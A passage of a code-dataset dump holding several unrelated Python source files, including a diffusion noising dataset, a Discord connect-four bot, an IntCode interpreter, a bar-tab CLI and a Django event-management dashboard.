fps=30)\n\n","repo_name":"tidiane-camaret/hpc_fluid_dynamics","sub_path":"scripts/parallel/milestone2_parallel.py","file_name":"milestone2_parallel.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"4714337668","text":"import logging\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom rdkit import Chem\nfrom torch.utils.data import Dataset\n\nfrom ..utils import utils, variance_schedules\nfrom . import macrocycle\n\n\nclass NoisedDataset(Dataset):\n \"\"\"Class that produces noised outputs given a wrapped dataset. Wrapped dset should return a\n tensor from __getitem__ if dset_key is not specified; otherwise, returns a dictionary where the\n item to noise is under dset_key.\n\n modulo can be given as either a float or a list of floats\n \"\"\"\n\n def __init__(\n self,\n dset: macrocycle.MacrocycleInternalCoordinateDataset,\n dset_key: str = \"angles\",\n timesteps: int = 50,\n exhaustive_t: bool = False,\n beta_schedule: variance_schedules.SCHEDULES = \"cosine\",\n nonangular_variance: float = 1.0,\n angular_variance: float = 1.0,\n ) -> None:\n super().__init__()\n\n self.dset = dset\n assert hasattr(dset, \"feature_names\")\n assert hasattr(dset, \"feature_is_angular\")\n self.dset_key = dset_key\n self.n_features = len(dset.feature_is_angular)\n\n self.nonangular_var_scale = nonangular_variance\n self.angular_var_scale = angular_variance\n\n self.timesteps = timesteps\n self.schedule = beta_schedule\n self.exhaustive_timesteps = exhaustive_t\n if self.exhaustive_timesteps:\n logging.info(f\"Exhuastive timesteps for {dset}\")\n\n betas = variance_schedules.get_variance_schedule(beta_schedule, timesteps)\n self.alpha_beta_terms = variance_schedules.compute_alphas(betas)\n\n @property\n def structures(self) -> Optional[Dict[str, Dict[str, pd.DataFrame]]]:\n return self.dset.structures\n\n @property\n def atom_features(self) -> Optional[Dict[str, Dict[str, Union[Chem.Mol, pd.DataFrame]]]]:\n return self.dset.atom_features\n\n @property\n def feature_names(self) -> Tuple[str, ...]:\n \"\"\"Pass through feature names property of wrapped dset.\"\"\"\n return self.dset.feature_names\n\n @property\n def feature_is_angular(self) -> Tuple[bool, ...]:\n \"\"\"Pass through feature is angular property of wrapped dset.\"\"\"\n return self.dset.feature_is_angular\n\n @property\n def pad(self) -> int:\n \"\"\"Pass through the pad property of wrapped dset.\"\"\"\n return self.dset.pad\n\n @property\n def means(self) -> Optional[np.ndarray]:\n return self.dset.means\n\n @property\n def means_dict(self) -> Optional[Dict[str, float]]:\n return self.dset.means_dict\n\n @means.setter\n def means(self, means: Dict[str, float]) -> None:\n self.dset.means = means\n\n @property\n def all_lengths(self) -> List[int]:\n return self.dset.all_lengths\n\n def sample_length(self, *args, **kwargs) -> Union[int, List[int]]:\n return self.dset.sample_length(*args, **kwargs)\n\n def get_atom_features(\n self, *args, **kwargs\n ) -> Union[torch.Tensor, Tuple[torch.Tensor, List[int]]]:\n return self.dset.get_atom_features(*args, **kwargs)\n\n def get_structure_as_dataframe(self, index: int) -> pd.DataFrame:\n return self.dset.get_structure_as_dataframe(index)\n\n def __str__(self) -> str:\n return f\"NoisedAnglesDataset wrapping {self.dset} with {len(self)} examples with {self.schedule}-{self.timesteps} with variance scales {self.nonangular_var_scale} and {self.angular_var_scale}\"\n\n def __len__(self) -> int:\n if not self.exhaustive_timesteps:\n return len(self.dset)\n else:\n return int(len(self.dset) * self.timesteps)\n\n def sample_noise(self, vals: torch.Tensor) -> torch.Tensor:\n \"\"\"Adaptively sample noise based on modulo.\n\n We scale only the variance because we want the noise to remain zero centered\n \"\"\"\n # Noise is always 0 centered\n noise = torch.randn_like(vals)\n\n # Shapes of vals couled be (batch, seq, feat) or (seq, feat)\n # Therefore we need to index into last dimension consistently\n\n # Scale by provided variance scales based on angular or not\n if self.angular_var_scale != 1.0 or self.nonangular_var_scale != 1.0:\n for j in range(noise.shape[-1]): # Last dim = feature dim\n s = (\n self.angular_var_scale\n if self.feature_is_angular[j]\n else self.nonangular_var_scale\n )\n noise[..., j] *= s\n\n # Make sure that the noise doesn't run over the boundaries\n noise[..., self.feature_is_angular] = utils.modulo_with_wrapped_range(\n noise[..., self.feature_is_angular], -np.pi, np.pi\n )\n\n return noise\n\n def __getitem__(\n self,\n index: int,\n use_t_val: Optional[int] = None,\n ignore_zero_center: bool = False,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"Gets the i-th item in the dataset and adds noise use_t_val is useful for manually\n querying specific timepoints.\"\"\"\n assert 0 <= index < len(self), f\"Index {index} out of bounds for {len(self)}\"\n # Handle cases where we exhaustively loop over t\n if self.exhaustive_timesteps:\n item_index = index // self.timesteps\n assert item_index < len(self)\n time_index = index % self.timesteps\n logging.debug(f\"Exhaustive {index} -> item {item_index} at time {time_index}\")\n assert (\n item_index * self.timesteps + time_index == index\n ), f\"Unexpected indices for {index} -- {item_index} {time_index}\"\n item = self.dset.__getitem__(item_index, ignore_zero_center=ignore_zero_center)\n else:\n item = self.dset.__getitem__(index, ignore_zero_center=ignore_zero_center)\n\n # If wrapped dset returns a dictionary then we extract the item to noise\n if self.dset_key is not None:\n assert isinstance(item, dict)\n vals = item[self.dset_key].clone()\n else:\n vals = item.clone()\n assert isinstance(\n vals, torch.Tensor\n ), f\"Using dset_key {self.dset_key} - expected tensor but got {type(vals)}\"\n\n # Sample a random timepoint and add corresponding noise\n if use_t_val is not None:\n assert not self.exhaustive_timesteps, \"Cannot use specific t in exhaustive mode\"\n t_val = np.clip(np.array([use_t_val]), 0, self.timesteps - 1)\n t = torch.from_numpy(t_val).long()\n elif self.exhaustive_timesteps:\n t = torch.tensor([time_index]).long() # list to get correct shape\n else:\n t = torch.randint(0, self.timesteps, (1,)).long()\n\n # Get the values for alpha and beta\n sqrt_alphas_cumprod_t = self.alpha_beta_terms[\"sqrt_alphas_cumprod\"][t.item()]\n sqrt_one_minus_alphas_cumprod_t = self.alpha_beta_terms[\"sqrt_one_minus_alphas_cumprod\"][\n t.item()\n ]\n # Noise is sampled within range of [-pi, pi], and optionally\n # shifted to [0, 2pi] by adding pi\n noise = self.sample_noise(vals) # Vals passed in only for shape\n\n # Add noise and ensure noised vals are still in range\n noised_vals = sqrt_alphas_cumprod_t * vals + sqrt_one_minus_alphas_cumprod_t * noise\n assert noised_vals.shape == vals.shape, f\"Unexpected shape {noised_vals.shape}\"\n # The underlying vals are already shifted, and noise is already shifted\n # All we need to do is ensure we stay on the corresponding manifold\n # Wrap around the correct range\n noised_vals[:, self.feature_is_angular] = utils.modulo_with_wrapped_range(\n noised_vals[:, self.feature_is_angular], -np.pi, np.pi\n )\n\n retval = {\n \"corrupted\": noised_vals,\n \"t\": t,\n \"known_noise\": noise,\n \"sqrt_alphas_cumprod_t\": sqrt_alphas_cumprod_t,\n \"sqrt_one_minus_alphas_cumprod_t\": sqrt_one_minus_alphas_cumprod_t,\n }\n\n # Update dictionary if wrapped dset returns dicts, else just return\n if isinstance(item, dict):\n assert item.keys().isdisjoint(retval.keys())\n item.update(retval)\n return item\n return retval\n","repo_name":"Genentech/ringer","sub_path":"ringer/data/noised.py","file_name":"noised.py","file_ext":"py","file_size_in_byte":8314,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"10464231498","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.user import User\nfrom swagger_server.models.time_interval import TimeInterval\nfrom swagger_server import util\n\n\nclass ResourceQuery(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, user_info: User=None, time_info: TimeInterval=None): # noqa: E501\n \"\"\"ResourceQuery - a model defined in Swagger\n\n :param user_info: The user_info of this ResourceQuery. # noqa: E501\n :type user_info: User\n :param time_info: The time_info of this ResourceQuery. # noqa: E501\n :type time_info: TimeInterval\n \"\"\"\n self.swagger_types = {\n 'user_info': User,\n 'time_info': TimeInterval\n }\n\n self.attribute_map = {\n 'user_info': 'userInfo',\n 'time_info': 'timeInfo'\n }\n\n self._user_info = user_info\n self._time_info = time_info\n\n @classmethod\n def from_dict(cls, dikt) -> 'ResourceQuery':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The ResourceQuery of this ResourceQuery. # noqa: E501\n :rtype: ResourceQuery\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def user_info(self) -> User:\n \"\"\"Gets the user_info of this ResourceQuery.\n\n\n :return: The user_info of this ResourceQuery.\n :rtype: User\n \"\"\"\n return self._user_info\n\n @user_info.setter\n def user_info(self, user_info: User):\n \"\"\"Sets the user_info of this ResourceQuery.\n\n\n :param user_info: The user_info of this ResourceQuery.\n :type user_info: User\n \"\"\"\n\n self._user_info = user_info\n\n @property\n def time_info(self) -> TimeInterval:\n \"\"\"Gets the time_info of this ResourceQuery.\n\n\n :return: The time_info of this ResourceQuery.\n :rtype: TimeInterval\n \"\"\"\n return self._time_info\n\n @time_info.setter\n def time_info(self, time_info: TimeInterval):\n \"\"\"Sets the time_info of this ResourceQuery.\n\n\n :param time_info: The time_info of this ResourceQuery.\n :type time_info: TimeInterval\n \"\"\"\n\n self._time_info = time_info\n","repo_name":"5GZORRO/datalake","sub_path":"services/catalog/python-flask-server/swagger_server/models/resource_query.py","file_name":"resource_query.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"24051981010","text":"import urllib.request\nimport urllib.parse\nimport ssl\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36'\n}\n\nurl = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule&smartresult=ugc&sessionFrom=null'\n\nformdata = {\n 'i': '男人',\n 'from': 'AUTO',\n 'to': 'AUTO',\n 'smartresult': 'dict',\n 'client': 'fanyideskweb',\n 'doctype': 'json',\n 'version': '2.1',\n 'keyfrom': 'fanyi.web',\n 'action': 'FY_BY_CLICKBUTTION',\n 'typoResult': 'false',\n}\n# 取消验证\ncontext = ssl._create_unverified_context()\n\n# 编码并转成Unicode\nformdata = urllib.parse.urlencode(formdata).encode('utf8')\n\n# 创建request\nrequest = urllib.request.Request(url=url, data=formdata, headers=headers)\n\n# 发送请求\nresponse = urllib.request.urlopen(request, context=context)\n\nprint(response.read())\n","repo_name":"doublepixel/paChong","sub_path":"代码/02day/urllib的post请求.py","file_name":"urllib的post请求.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12171875859","text":"import discord\nfrom ext import commands\nimport asyncio \n\nred = '\\N{LARGE RED CIRCLE}'\nblue = '\\N{LARGE BLUE CIRCLE}'\nblank = '\\N{MEDIUM BLACK CIRCLE}'\n\n\nclass ConnectFour:\n\n\n def __init__(self, bot):\n self.bot = bot\n \n @staticmethod\n def grid_maker():\n rows = 7\n cols = 7\n grid = []\n for i in range(rows):\n line = []\n for value in range(cols):\n line.append(blank)\n grid.append(line)\n return grid\n\n\n async def get_move(self, base, player):\n\n def move_check(message):\n if message.author == player:\n return True\n\n\n msg = await self.bot.wait_for_message(timeout=60, \n channel=base.channel, \n check=move_check)\n while msg:\n if msg.content.isdigit():\n print('yes')\n if int(msg.content) >= 1 and int(msg.content) <= 7:\n ret = int(msg.content) - 1\n await asyncio.sleep(0.2)\n await self.bot.delete_message(msg)\n return ret\n else:\n to_del = await self.bot.send_message(base.channel, 'Enter a valid number {}'.format(player.mention))\n await asyncio.sleep(0.2)\n await self.bot.delete_messages([msg, to_del])\n else:\n if msg.content.strip().lower() == 'give up':\n return None\n to_del = await self.bot.send_message(base.channel, 'You have to enter an integer {}'.format(player.mention))\n await asyncio.sleep(0.1)\n await self.bot.delete_messages([msg, to_del])\n\n msg = await self.bot.wait_for_message(timeout=60, \n channel=base.channel, \n check=move_check)\n print('NO')\n return None\n\n\n async def player_input(self, base, grid, colour, player):\n to_del = await self.bot.send_message(base.channel, 'Enter a move {}'.format(player.mention))\n move = await self.get_move(base, player)\n await self.bot.delete_message(to_del)\n while move is not None:\n for i in range(len(grid)):\n if grid[i][move] == blank:\n grid[i][move] = colour\n pos = [i,int(move)]\n return [grid, pos]\n to_del = await self.bot.send_message(base.channel,\"Column Full! Try another Column\")\n move = await self.get_move(base, player)\n await self.bot.delete_message(to_del)\n return False\n\n\n async def display_grid(self, base, grid):\n fmt = ''\n for i in reversed(grid):\n fmt += ''.join(i)+' \\n'\n numbers = ':one::two::three::four::five::six::seven:'\n fmt += numbers\n await self.bot.edit_message(base, fmt)\n\n\n\n async def start_game(self, ctx, base, p1, p2):\n grid = self.grid_maker()\n cycles = int(len(grid)*len(grid[0])/2)\n for i in range(cycles):\n # Player 1\n\n await self.display_grid(base, grid)\n move = await self.player_input(base, grid, red, p1)\n if not move:\n await self.bot.say('**{}** wins the game! **{}** gave up!'.format(p2.name, p1.name))\n break\n if self.win_condition(move[1], move[0], red):\n await self.display_grid(base, grid)\n await self.bot.say('**{}** wins the game! 4 in a row!'.format(p1.name))\n break\n\n # Player 2\n\n await self.display_grid(base, grid)\n move = await self.player_input(base, grid, blue, p2)\n if not move:\n await self.bot.say('**{}** wins the game! **{}** gave up!'.format(p1.name, p2.name))\n break\n if self.win_condition(move[1], move[0], blue):\n await self.display_grid(base, grid)\n await self.bot.say('**{}** wins the game! 4 in a row!'.format(p2.name))\n break\n\n \n \n @commands.command(pass_context=True, aliases=['4row'])\n async def four_row(self, ctx, player: discord.Member):\n p1, p2 = ctx.message.author, player\n base = await self.bot.say('**{}** has challenged **{}** to a connect-four duel!'.format(p1.name, p2.name))\n await asyncio.sleep(3)\n await self.start_game(ctx, base, p1, p2)\n\n @staticmethod\n def win_condition(coordinate, grid, colour):\n row_num = coordinate[0]\n col_num = coordinate[1]\n\n horizontal_counter = 0\n horizontal_row = ''.join(grid[row_num])\n for value in horizontal_row:\n if value == colour:\n horizontal_counter += 1\n else:\n horizontal_counter = 0\n if horizontal_counter == 4:\n return True\n vertical_counter = 0\n for i in range(row_num+1):\n if grid[i][col_num] == colour:\n vertical_counter += 1\n else:\n vertical_counter = 0\n if vertical_counter == 4:\n return True\n diagonal_counter_one = 0\n diagonal_counter_two = 0\n for num in range(4):\n try:\n if grid[row_num-num][col_num+num] == colour:\n diagonal_counter_one += 1\n except:\n pass\n try:\n if grid[row_num-num][col_num-num] == colour:\n diagonal_counter_two += 1\n except:\n pass\n\n if diagonal_counter_one == 4:\n return True\n if diagonal_counter_two == 4:\n return True\n return False\n\n \n \n \ndef setup(bot):\n bot.add_cog(ConnectFour(bot))\n\n\n \n \n\n\n \n\n \n","repo_name":"umbresp/KnightBot2.0","sub_path":"cogs/conn4.py","file_name":"conn4.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"14489547491","text":"clientes = {}\n\ncomandas_abertas = []\n\n\n# Função Principal\n\ndef main():\n while True:\n print(\"Menu de opções:\")\n print(\"1. Cadastrar novo cliente\")\n print(\"2. Abrir comanda\")\n print(\"3. Fazer um pedido\")\n print(\"4. Fechar comanda\")\n print(\"5. Ver comandas abertas\")\n print(\"6. Ver clientes cadastrados\")\n print(\"7. Ver valor da comanda aberta\")\n print(\"8. Sair\")\n opcao = input(\"Digite a opção desejada: \")\n if opcao == \"1\":\n cadastrar_cliente()\n elif opcao == \"2\":\n abrir_comanda()\n elif opcao == \"3\":\n fazer_pedido()\n elif opcao == \"4\":\n fechar_comanda()\n elif opcao == \"5\":\n ver_comandas_abertas()\n elif opcao == \"6\":\n ver_clientes_cadastrados()\n elif opcao == \"7\":\n ver_valor_comanda_aberta()\n elif opcao == \"8\":\n sair()\n else:\n print(\"Opção inválida.\")\n\n\n# Cadastrar novo cliente\n\ndef cadastrar_cliente():\n nome = input(\"Digite o nome do cliente: \")\n telefone = input(\"Digite o telefone do cliente: \")\n clientes[telefone] = nome\n print(\"Cliente cadastrado com sucesso!\")\n\n# Abrir comanda\n\ndef abrir_comanda():\n telefone = input(\"Digite o número do telefone do cliente: \")\n if telefone in clientes:\n comandas_abertas.append({\n \"telefone\": telefone,\n \"pedidos\": [],\n \"valor_total\": 0\n })\n print(\"Comanda aberta com sucesso!\")\n else:\n print(\"Cliente não encontrado.\")\n\n\n# Fazer um pedido\n\ndef fazer_pedido():\n telefone = input(\"Digite o número do telefone do cliente: \")\n comanda = None\n for c in comandas_abertas:\n if c[\"telefone\"] == telefone:\n comanda = c\n break\n if comanda is None:\n print(\"Comanda não encontrada.\")\n return\n print(\"Menu de bebidas:\")\n print(\"1. Cerveja (R$5)\")\n print(\"2. Refrigerante (R$4)\")\n print(\"3. Suco (R$3)\")\n opcao = input(\"Digite o número da bebida desejada: \")\n if opcao == \"1\":\n bebida = \"Cerveja\"\n valor = 5\n elif opcao == \"2\":\n bebida = \"Refrigerante\"\n valor = 4\n elif opcao == \"3\":\n bebida = \"Suco\"\n valor = 3\n else:\n print(\"Opção inválida.\")\n return\n comanda[\"pedidos\"].append({\n \"bebida\": bebida,\n \"valor\": valor\n })\n comanda[\"valor_total\"] += valor\n print(\"Pedido adicionado com sucesso!\")\n\n# Fechar comanda\n\ndef fechar_comanda():\n telefone = input(\"Digite o número do telefone do cliente: \")\n comanda = None\n for c in comandas_abertas:\n if c[\"telefone\"] == telefone:\n comanda = c\n break\n if comanda is None:\n print(\"Comanda não encontrada.\")\n return\n print(\"Comanda do cliente\", clientes[telefone])\n for pedido in comanda[\"pedidos\"]:\n print(pedido[\"bebida\"], \"- R$\", pedido[\"valor\"])\n print(\"Valor total: R$\", comanda[\"valor_total\"])\n comandas_abertas.remove(comanda)\n print(\"Comanda fechada com sucesso!\")\n\n\n# Ver comandas abertas\n\ndef ver_comandas_abertas():\n for c in comandas_abertas:\n print(\"Comanda do cliente\", clientes[c[\"telefone\"]])\n for pedido in c[\"pedidos\"]:\n print(pedido[\"bebida\"], \"- R$\", pedido[\"valor\"])\n print(\"Valor total: R$\", c[\"valor_total\"])\n\n\n# Ver clientes cadastrados\n\ndef ver_clientes_cadastrados():\n for telefone, nome in clientes.items():\n print(nome, \"-\", telefone)\n\n\n# Ver valor da comanda aberta\n\ndef ver_valor_comanda_aberta():\n telefone = input(\"Digite o número do telefone do cliente: \")\n comanda = None\n for c in comandas_abertas:\n if c[\"telefone\"] == telefone:\n comanda = c\n break\n if comanda is None:\n print(\"Comanda não encontrada.\")\n return\n print(\"Valor total da comanda:\", comanda[\"valor_total\"])\n\n\n# Sair do sistema\n\ndef sair():\n print(\"Saindo do sistema...\")\n exit()\n\n# Chamar a função main() para iniciar o sistema\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ODCS1/python","sub_path":"praticando/p004/script7.py","file_name":"script7.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"21972078557","text":"#!/usr/bin/env python3\n\nimport sys\nimport itertools\n\nclass IntCodeVM:\n class Stop(Exception):\n pass\n\n class InvalidMode(Exception):\n pass\n\n class InvalidDestination(Exception):\n pass\n\n def __init__(self, memory, inputs=None):\n self.memory = memory.copy()\n self.ip = 0\n self.inputs = inputs.copy()\n self.inputs.reverse()\n self.outputs = []\n\n def value(self, parameter, mode):\n if mode == 0:\n return self.memory[parameter]\n if mode == 1:\n return parameter\n raise IntCodeVM.InvalidMode(f\"Invalid mode {mode}\")\n\n def get_parameter_addr(self, offset):\n return self.memory[self.ip + offset]\n\n def get_parameter(self, offset):\n opcode = self.memory[self.ip]\n mode = (opcode // (10 ** (1 + offset))) % 10\n p = self.memory[self.ip + offset]\n value = self.value(p, mode)\n return value\n\n def get_a(self):\n \"Get the A (first) parameter\"\n return self.get_parameter(1)\n\n def get_a_addr(self):\n \"Get the A (first) parameter\"\n return self.get_parameter_addr(1)\n\n def get_b(self):\n \"Get the B (second) parameter\"\n return self.get_parameter(2)\n\n def get_b_addr(self):\n \"Get the B (second) parameter\"\n return self.get_parameter_addr(2)\n\n def get_c(self):\n \"Get the C (third) parameter\"\n return self.get_parameter(3)\n\n def get_c_addr(self):\n \"Get the C (third) parameter\"\n return self.get_parameter_addr(3)\n\n def get_input(self):\n if not self.inputs:\n return int(input())\n return self.inputs.pop()\n\n def step(self):\n opcode = self.memory[self.ip]\n if opcode is None:\n raise IntCodeVM.Stop()\n\n operation = opcode % 100\n\n if operation == 1: # ADD\n self.memory[self.get_c_addr()] = self.get_a() + self.get_b()\n self.ip += 4\n elif operation == 2: # MUL\n self.memory[self.get_c_addr()] = self.get_a() * self.get_b()\n self.ip += 4\n elif operation == 3: # INPUT\n self.memory[self.get_a_addr()] = self.get_input()\n self.ip += 2\n elif operation == 4: # OUTPUT\n self.outputs.append(self.get_a())\n self.ip += 2\n elif operation == 5: # JUMP-IF-TRUE\n if self.get_a() != 0:\n self.ip = self.get_b()\n else:\n self.ip += 3\n elif operation == 6: # JUMP-IF-FALSE\n if self.get_a() == 0:\n self.ip = self.get_b()\n else:\n self.ip += 3\n elif operation == 7: # LESS-THAN\n if self.get_a() < self.get_b():\n self.memory[self.get_c_addr()] = 1\n else:\n self.memory[self.get_c_addr()] = 0\n self.ip += 4\n elif operation == 8: # EQUALS\n if self.get_a() == self.get_b():\n self.memory[self.get_c_addr()] = 1\n else:\n self.memory[self.get_c_addr()] = 0\n self.ip += 4\n elif operation == 99:\n self.ip += 1\n raise IntCodeVM.Stop()\n\n def run(self):\n try:\n while True:\n self.step()\n except IntCodeVM.Stop as _ex:\n return\n\n\ninfile = open(sys.argv[1])\n\nline = open(sys.argv[1]).readline()\nmemory = [int(x) for x in line.split(\",\")]\n\nsignals = []\nfor phase_set in itertools.permutations(range(5)):\n acc = 0\n for i in range(5):\n vm = IntCodeVM(memory.copy(), inputs=[phase_set[i], acc])\n vm.run()\n acc = vm.outputs[0]\n signals.append(acc)\n\nprint(f\"total is {max(signals)}\")\n","repo_name":"nrw505/adventofcode-2019","sub_path":"day7/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20419197963","text":"import json\nimport webapp2\nimport configs\nfrom google.appengine.api import urlfetch\n\n\nclass QueueHandler(webapp2.RequestHandler):\n \"\"\"Task queue handler.\"\"\"\n\n def slack(self):\n \"\"\"Sends data to the Slack Webhook URL.\"\"\"\n text = self.request.get('text')\n if not text:\n return\n payload = {\n 'username': 'hl-bot',\n 'icon_emoji': ':rocket:',\n 'text': text\n }\n urlfetch.fetch(url=configs.SLACK_URL,\n payload=json.dumps(payload),\n method=urlfetch.POST,\n headers={'Content-Type': 'application/json'})\n","repo_name":"venvadlamani/HumanLink","sub_path":"controllers/tqueue.py","file_name":"tqueue.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73768656624","text":"# fixed moves\n# unstable sort\n\nimport random\n\nl = [random.randint(-50,50) for _ in range(100)]\n\nfor i in range(len(l)-1):\n min_idx = i\n for j in range(i+1,len(l)):\n if l[j] < l[min_idx]:\n min_idx = j\n l[i], l[min_idx] = l[min_idx], l[i]\n\nprint(l == sorted(l))","repo_name":"jsg921019/algorithm_study","sub_path":"data_structure/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74597127022","text":"import json\nfrom datetime import datetime\n\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom dashboard.forms import EventForm, UserForm, TicketForm\nfrom eventapp.models import Ticket, Coupon, Reservation\nfrom eventapp.models import Event\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\n\n\n# ************** Admin\n\n\n@login_required(login_url='authentification:login')\ndef admin_dashboard(request):\n users = User.objects.filter(is_staff=True)\n events = Event.objects.filter(user__is_staff=True, is_confirmed=False)\n tickets_sold = Reservation.objects.count()\n total_events = Event.objects.filter(user__is_staff=True).count()\n current_datetime = datetime.now()\n upcoming_tickets = Ticket.objects.filter(event__user__is_staff=True, reservation_date__gt=current_datetime).count()\n expired_tickets = Ticket.objects.filter(event__user__is_staff=True, reservation_date__lt=current_datetime).count()\n\n context = {\n 'users': users,\n 'events': events,\n 'tickets_sold': tickets_sold,\n 'total_events': total_events,\n 'upcoming_tickets': upcoming_tickets,\n 'expired_tickets': expired_tickets\n }\n\n return render(request, 'dashboard/admin/dashboard.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef add_user(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard:admin-dashboard')\n else:\n form = UserForm()\n\n context = {'form': form}\n return render(request, 'dashboard/admin/add-user.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef edit_user(request, user_id):\n user = get_object_or_404(User, id=user_id)\n users = User.objects.exclude(id=user_id)\n\n if request.method == \"POST\":\n is_staff = request.POST.get('is_staff') == '1' # Check if the radio button value is '1'\n\n form = UserChangeForm(request.POST, instance=user)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_staff = is_staff\n user.email = form.cleaned_data['email'] # Update the email field\n user.save()\n return redirect('dashboard:admin-dashboard')\n else:\n form = UserChangeForm(instance=user, initial={'email': user.email}) # Set initial email value\n\n context = {\n 'form': form,\n 'users': users\n }\n return render(request, 'dashboard/admin/edit-user.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef confirm_event(request, event_id):\n if request.method == 'POST':\n event = get_object_or_404(Event, pk=event_id)\n event.is_confirmed = True\n event.save()\n return redirect('dashboard:admin-dashboard')\n else:\n return render(request, 'dashboard/admin/dashboard.html')\n\n\n# ************** Manager\n@login_required(login_url='authentification:login')\ndef dashboard(request):\n context = {\n \"welcome\": \"Welcome to your dashboard\"\n }\n # return render(request, 'authentification/dashboard.html', context=context)\n return render(request, 'dashboard/base/dashboard.html', context=context)\n\n\n@login_required(login_url='authentification:login')\ndef manager_dashboard(request):\n user = request.user\n events = Event.objects.filter(user=user)\n tickets = Ticket.objects.filter(event__in=events)\n return render(request, 'dashboard/manager/dashboard.html', {'events': events, 'tickets': tickets})\n\n\n@login_required(login_url='authentification:login')\ndef add_event(request):\n if request.method == 'POST':\n form = EventForm(request.POST, request.FILES)\n if form.is_valid():\n event = form.save(commit=False)\n event.user = request.user # Set the current user as the event's user\n event.save()\n return redirect('dashboard:manager-dashboard')\n else:\n form = EventForm()\n return render(request, 'dashboard/manager/add-event.html', {'form': form})\n\n\n@login_required(login_url='authentification:login')\ndef add_ticket(request):\n # Retrieve events for the connected user\n events = Event.objects.filter(user=request.user)\n coupons = Coupon.objects.filter(user=request.user) # Retrieve coupons for the connected user\n\n if request.method == 'POST':\n event_id = request.POST['event']\n quantity = request.POST['quantity']\n price = request.POST['price']\n coupon_id = request.POST['coupon'] # Get the selected coupon ID\n\n event = Event.objects.get(id=event_id)\n\n ticket = Ticket(event=event, user=request.user, quantity=quantity, price=price, coupon_id=coupon_id)\n ticket.save()\n\n return redirect('dashboard:manager-dashboard')\n\n # Pass the events and coupons to the template context\n context = {'events': events, 'coupons': coupons}\n\n return render(request, 'dashboard/manager/add-ticket.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef ticket_edit(request, ticket_id):\n ticket = get_object_or_404(Ticket, id=ticket_id)\n if request.method == 'POST':\n form = TicketForm(request.POST, instance=ticket)\n if form.is_valid():\n form.save()\n return redirect(\n 'dashboard:manager-dashboard') # Replace 'dashboard:ticket-list' with your actual URL name for the ticket list page\n else:\n form = TicketForm(instance=ticket)\n\n context = {\n 'form': form,\n 'ticket': ticket,\n }\n return render(request, 'dashboard/manager/edit-ticket.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef event_edit(request, event_id):\n event = Event.objects.get(id=event_id)\n\n if request.method == 'POST':\n form = EventForm(request.POST, request.FILES, instance=event)\n if form.is_valid():\n form.save()\n messages.success(request, 'Event updated successfully.')\n return redirect('dashboard:manager-dashboard')\n else:\n form = EventForm(instance=event)\n\n context = {\n 'event': event,\n 'form': form,\n }\n return render(request, 'dashboard/manager/edit-event.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef event_edit_dash(request, event_id):\n event = get_object_or_404(Event, id=event_id, user=request.user)\n\n if request.method == 'POST':\n # Process the form data\n form = EventForm(request.POST, instance=event)\n if form.is_valid():\n form.save()\n return JsonResponse({'success': True})\n else:\n return JsonResponse({'success': False, 'errors': form.errors})\n\n # GET request\n form = EventForm(instance=event)\n events = Event.objects.filter(user=request.user).values('id', 'title', 'date', 'time', 'location', 'category')\n\n context = {\n 'form': form,\n 'events_json': json.dumps({event['id']: event for event in events}),\n }\n\n return render(request, 'dashboard/manager/event-edit-dash.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef delete_event(request, event_id):\n event = get_object_or_404(Event, pk=event_id)\n if request.method == 'POST':\n event.delete()\n # Redirect to the dashboard or any other page after successful deletion\n return redirect('dashboard:manager-dashboard')\n\n # Handle GET request or any other method\n # Render a confirmation template or perform any other desired action\n return render(request, 'dashboard/delete_confirmation.html', {'event': event})\n\n\n# 